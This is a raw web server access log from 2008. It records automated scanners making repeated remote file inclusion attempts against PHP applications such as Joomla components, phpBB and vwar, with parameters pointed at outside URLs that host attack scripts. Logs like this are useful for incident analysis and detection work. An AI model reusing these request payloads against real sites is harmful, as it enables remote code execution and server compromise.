66.98.248.50 - - [10/Apr/2008:10:59:59 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:10:59:59 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:00:01 -0700] "GET /logs/access_080211.log//mcf.php?content=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:00:01 -0700] "GET //mcf.php?content=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:00:01 -0700] "GET /logs//mcf.php?content=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:11:00:07 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /logs/access_080226.log/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /logs/access_080226.log/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:15 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:27 -0700] "GET /logs/access_080226.log/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:28 -0700] "GET /appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:00:28 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:11:00:38 -0700] "GET /logs/access_080117.log//mcf.php?content=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:11:00:46 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:11:00:46 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:11:00:47 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:01:08 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.156 - - [10/Apr/2008:11:01:11 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.102 - - [10/Apr/2008:11:01:14 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:02:38 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:02:38 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:02:39 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:03:22 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:11:03:22 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:03:35 -0700] "GET //zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:03:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:03:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:11:04:00 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:11:04:00 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:11:04:01 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:04:01 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:04:07 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:04:08 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:04:08 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.33.234 - - [10/Apr/2008:11:04:25 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:04:49 -0700] "GET /logs/access_080309.log/newspublish/include.php?path%5Bdocroot%5D=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:11:04:59 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.97 - - [10/Apr/2008:11:05:05 -0700] "GET /index.php?redir=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:11:05:11 -0700] "GET /logs/access_080308.log/index.php?redir=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:11:05:13 -0700] "GET /index.php?redir=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:11:05:13 -0700] "GET /logs/index.php?redir=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [10/Apr/2008:11:05:35 -0700] "GET /logs/access_080215.log/index.php?redir=http://dt-support.com/hcl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:11:06:20 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:11:06:20 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [10/Apr/2008:11:06:21 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:06:37 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:06:50 -0700] "GET /logs/access.log/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:06:51 -0700] "GET /scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:06:51 -0700] "GET /logs/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.195.11.193 - - [10/Apr/2008:11:07:01 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://www.benew.nl/vragenlijst/classes/core/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:07:05 -0700] "GET /logs/access_080131.log/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:11:07:06 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:11:07:07 -0700] "GET //login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:11:07:07 -0700] "GET /logs//login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.253.174.91 - - [10/Apr/2008:11:07:29 -0700] "GET /logs/access.loghttp://myownmarriage.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:07:41 -0700] "GET /logs/access_080306.log/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
66.98.248.50 - - [10/Apr/2008:11:07:46 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.math-center.gr/components/com_facileforms/.log/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:11:08:06 -0700] "GET /logs/access.log/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [10/Apr/2008:11:08:08 -0700] "GET /scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [10/Apr/2008:11:08:09 -0700] "GET /logs/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:11:08:17 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:08:19 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:08:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:08:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.192.249 - - [10/Apr/2008:11:08:29 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw_conver.php?step=http://www.twinzinenonzin.nl/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.192.249 - - [10/Apr/2008:11:08:29 -0700] "GET /logs//vwar/convert/mvcw_conver.php?step=http://www.twinzinenonzin.nl/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
60.249.45.142 - - [10/Apr/2008:11:08:44 -0700] "GET /logs/access_080131.log/scanhttp://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
199.238.142.186 - - [10/Apr/2008:11:09:09 -0700] "GET /logs/access_080306.log/appserv/main.php?appserv_root=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:09:27 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:09:27 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:09:38 -0700] "GET /logs/access_080117.log//mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:09:38 -0700] "GET //mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:09:39 -0700] "GET /logs//mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.16.55 - - [10/Apr/2008:11:09:42 -0700] "GET /logs/access_080127.log//modules/TotalCalendar/about.php?inc_dir=http://franklynlodge.com/templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:09:48 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:09:49 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:09:49 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:09:59 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.192.249 - - [10/Apr/2008:11:10:03 -0700] "GET /logs/access_071230.log//vwar/convert/mvcw_conver.php?step=http://www.twinzinenonzin.nl/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:10:08 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:10:16 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:11:10:19 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:11:10:20 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:11:10:20 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.244.197.249 - - [10/Apr/2008:11:10:21 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.151.239.80 - - [10/Apr/2008:11:10:23 -0700] "GET /logs/access_071116.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:10:37 -0700] "GET /logs/access_080211.log//mcf.php?content=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.220.4.204 - - [10/Apr/2008:11:10:43 -0700] "GET /logs/access_071225.loghttp://myownmarriage.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.107.242 - - [10/Apr/2008:11:10:44 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:11:11:10 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.160.126.183 - - [10/Apr/2008:11:12:11 -0700] "GET /logs/access.loghttp://myownmarriage.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:12:28 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.128.59.36 - - [10/Apr/2008:11:12:54 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:11:13:48 -0700] "GET /logs/access_080127.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [10/Apr/2008:11:13:48 -0700] "GET /logs//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.96.80 - - [10/Apr/2008:11:13:56 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [10/Apr/2008:11:13:56 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.96.80 - - [10/Apr/2008:11:13:57 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [10/Apr/2008:11:14:23 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [10/Apr/2008:11:14:24 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [10/Apr/2008:11:14:25 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:11:14:30 -0700] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lineupevents.nl/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:15:08 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:15:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:15:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:15:10 -0700] "GET /logs/access_080401.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:15:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:15:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.41.58 - - [10/Apr/2008:11:15:17 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
